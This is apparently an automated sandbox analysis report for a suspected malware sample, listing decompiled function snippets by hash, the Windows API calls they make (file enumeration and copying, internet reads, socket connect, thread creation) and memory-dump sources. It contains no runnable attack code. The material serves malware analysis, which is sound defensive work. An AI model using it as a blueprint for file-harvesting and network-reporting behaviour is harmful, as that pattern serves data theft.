                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_pyjnkasedf.jbxd
                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CloseWindow
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 2868366576-0
                                                                                                                                                                                                                                                        • Opcode ID: f4d9c6ba4e9a701b3573920a803274ae9bece7bd4425fbe0c6efe95fba0ea827
                                                                                                                                                                                                                                                        • Instruction ID: d60b07cf8a672717949dba87bf68fd795687971f0554df0c031e58f8c4180e5e
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f4d9c6ba4e9a701b3573920a803274ae9bece7bd4425fbe0c6efe95fba0ea827
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9641F439A00619DFCB09DFA8D885D8A7BF1FF483097014165E901AB232E736FA65CF85
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • FindNextFileA.KERNEL32(?,?), ref: 0042444B
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2023101864.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023077979.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023176833.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023196540.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023216590.0000000000456000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000004AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023521336.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_pyjnkasedf.jbxd
                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: FileFindNext
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 2029273394-0
                                                                                                                                                                                                                                                        • Opcode ID: 1b9c83de960ff81c1d950096eaa06dc742aa6aeec9eb82b456341443abe3bc43
                                                                                                                                                                                                                                                        • Instruction ID: 279b61e787d546a15e0ce89170029d3360bd267538d74d7176de0f36657dbb6e
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1b9c83de960ff81c1d950096eaa06dc742aa6aeec9eb82b456341443abe3bc43
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 053134769003068BCB14DF68DD80AEDB7B5BF94305F04891DD85AE7216EF70BA48CB94
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • FindNextFileA.KERNELBASE(?,?), ref: 00425EB9
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2023101864.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023077979.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023176833.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023196540.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023216590.0000000000456000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000004AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023521336.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_pyjnkasedf.jbxd
                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: FileFindNext
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 2029273394-0
                                                                                                                                                                                                                                                        • Opcode ID: 5bb10102d410accd88e043729c05815393cdd76e97a95470889a251323ba889b
                                                                                                                                                                                                                                                        • Instruction ID: 4917b0d0bf509ac4b48ba315415c0daa0a1ec13163d9b31807c4892726582589
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5bb10102d410accd88e043729c05815393cdd76e97a95470889a251323ba889b
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 71212E35600705CFC716CF69CD85A9AB7F4FF59302F008659E85AA7321EB30BA55CB58
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2023101864.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023077979.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023176833.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023196540.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023216590.0000000000456000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000004AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023521336.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_pyjnkasedf.jbxd
                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: InternetOpen
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 2038078732-0
                                                                                                                                                                                                                                                        • Opcode ID: 968f60981af98d2158de9c14a5bc94deb7c072138bea76f510ea84e7ef612230
                                                                                                                                                                                                                                                        • Instruction ID: b6ec2e2d321997cc68b5e65fea524a59d8001effa42a6dcd43a383c9ec5a40d3
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 968f60981af98d2158de9c14a5bc94deb7c072138bea76f510ea84e7ef612230
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9821A1756053048FC701EF68EC899A9BBF1BF89314B0445ACE849A7322FB71ED05CB85
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • FindNextFileA.KERNELBASE(?,?), ref: 00427EF8
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2023101864.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023077979.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023176833.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023196540.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023216590.0000000000456000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000004AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023521336.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_pyjnkasedf.jbxd
                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: FileFindNext
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 2029273394-0
                                                                                                                                                                                                                                                        • Opcode ID: 0829324e087eb89cc0703ecc2993205681f67510d819740254288c67d8042d9e
                                                                                                                                                                                                                                                        • Instruction ID: 68992acd8636ab39aa7b339f1399f96a4618495423b19e56a799ddc7092f2e6a
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0829324e087eb89cc0703ecc2993205681f67510d819740254288c67d8042d9e
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C1212C7A640314CFC709DF68DC85E9533B5FBA8704B048A69A81ACB361DA34EF08CB94
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • CreateThread.KERNEL32(00000000,00000000,Function_00031297,?,00000000,00000000), ref: 00430C10
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2023101864.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023077979.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023176833.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023196540.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023216590.0000000000456000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000004AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023521336.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_pyjnkasedf.jbxd
                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CreateThread
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 2422867632-0
                                                                                                                                                                                                                                                        • Opcode ID: 679c3d7b55f22d3eb28918db9ae7ece698ecc57fdb6a0e7a46cf67bdcb4de78f
                                                                                                                                                                                                                                                        • Instruction ID: 39ba90a6865103f9da2ee7bcf4f554cfe9dd875411265badae191992f00579e5
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 679c3d7b55f22d3eb28918db9ae7ece698ecc57fdb6a0e7a46cf67bdcb4de78f
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2D112E73210304AFD218DB5DECC192AB3EAEFC8215B08052AA955C33A2DA74ED14CA58
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00425BE1
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2023101864.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023077979.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023176833.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023196540.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023216590.0000000000456000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000004AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023521336.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_pyjnkasedf.jbxd
                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CopyFile
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 1304948518-0
                                                                                                                                                                                                                                                        • Opcode ID: 8613e9636e9d2f0b6c0f4f09a130345d0e28994f2b8db67d2f101d403ea2fe00
                                                                                                                                                                                                                                                        • Instruction ID: 1bc8f05c01a43e4f80ce5d9d66ab3cb253554ce5bea8fcdb0154dad17ce86ff6
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8613e9636e9d2f0b6c0f4f09a130345d0e28994f2b8db67d2f101d403ea2fe00
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 690128367412148FD602CB6EDDC5A597BFAAB882477040564E801EB366CB34EE02CB4C
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • InternetReadFile.WININET(00660CAC,?,000007CF,?,?,?,?,?,?,?,?,?,",?,?,build_id), ref: 00415F5E
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2023101864.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023077979.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023176833.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023196540.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023216590.0000000000456000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000004AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023521336.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_pyjnkasedf.jbxd
                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: FileInternetRead
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 778332206-0
                                                                                                                                                                                                                                                        • Opcode ID: e65778421bf159a6e9f2282b0f5b70b706a7c724bf39de6aee342938136c1913
                                                                                                                                                                                                                                                        • Instruction ID: 6481089a7ef5e0497d83b16e2d85378015b74c219217611e750782fe03efe8f3
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e65778421bf159a6e9f2282b0f5b70b706a7c724bf39de6aee342938136c1913
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FD0128317092059FD719DB58ECA4AA973F7BF88381B14007CE416C73A2DB60AD159B28
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0041CB35
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2023101864.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023077979.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023176833.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023196540.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023216590.0000000000456000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000004AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023521336.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_pyjnkasedf.jbxd
                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CopyFile
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 1304948518-0
                                                                                                                                                                                                                                                        • Opcode ID: 65d66db8e3955ec274538d239d5a7951ed36c2c2988af2b2c57de29bfc7f6b64
                                                                                                                                                                                                                                                        • Instruction ID: d2f15791ec18b5c67e9392afd22e3770f42c03646b511a034b85998d428c520e
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 65d66db8e3955ec274538d239d5a7951ed36c2c2988af2b2c57de29bfc7f6b64
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E1F049B23002059FD744DB6CEC82F6933E5AB88A45F005028AC06D73A6DE65ED15CB59
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • GlobalMemoryStatusEx.KERNEL32(?), ref: 0042D57A
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2023101864.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023077979.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023176833.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023196540.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023216590.0000000000456000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000004AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023521336.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_pyjnkasedf.jbxd
                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: GlobalMemoryStatus
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 1890195054-0
                                                                                                                                                                                                                                                        • Opcode ID: 9cb8932d93fc235599593a89352c7aa2b8be0c6731880565a46e1beeb2b49cd7
                                                                                                                                                                                                                                                        • Instruction ID: daf9ee533f3dfbc2b2eead8bcce60fa2f38be98557978c355d756c622c7cd5f0
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9cb8932d93fc235599593a89352c7aa2b8be0c6731880565a46e1beeb2b49cd7
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E9F0A4F5512318AFC704DB24CC84C0B3BB8EF89BB5B460599F9068B7A6D634E880CB57
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • connect.WS2_32(?,?,00000010), ref: 0041BBCA
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2023101864.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023077979.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023176833.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023196540.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023216590.0000000000456000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000004AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023521336.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_pyjnkasedf.jbxd
                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: connect
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 1959786783-0
                                                                                                                                                                                                                                                        • Opcode ID: d29a798e28274b3342516369fb1cfb7983a43e2ad5cce52130b55af28d773a6f
                                                                                                                                                                                                                                                        • Instruction ID: d6368b448a5408848ead62cf9ffa808a7134cd505ded6333b06fdbbade48ed35
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d29a798e28274b3342516369fb1cfb7983a43e2ad5cce52130b55af28d773a6f
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CE011975214700CFC328CF29DC8191AB7F6EF88714B19891DE59AD73A2DB70E845CB19
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • InternetCloseHandle.WININET ref: 00418C84
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2023101864.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023077979.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023176833.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023196540.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023216590.0000000000456000.00000008.00000001.01000000.00000003.sdmpDownload File
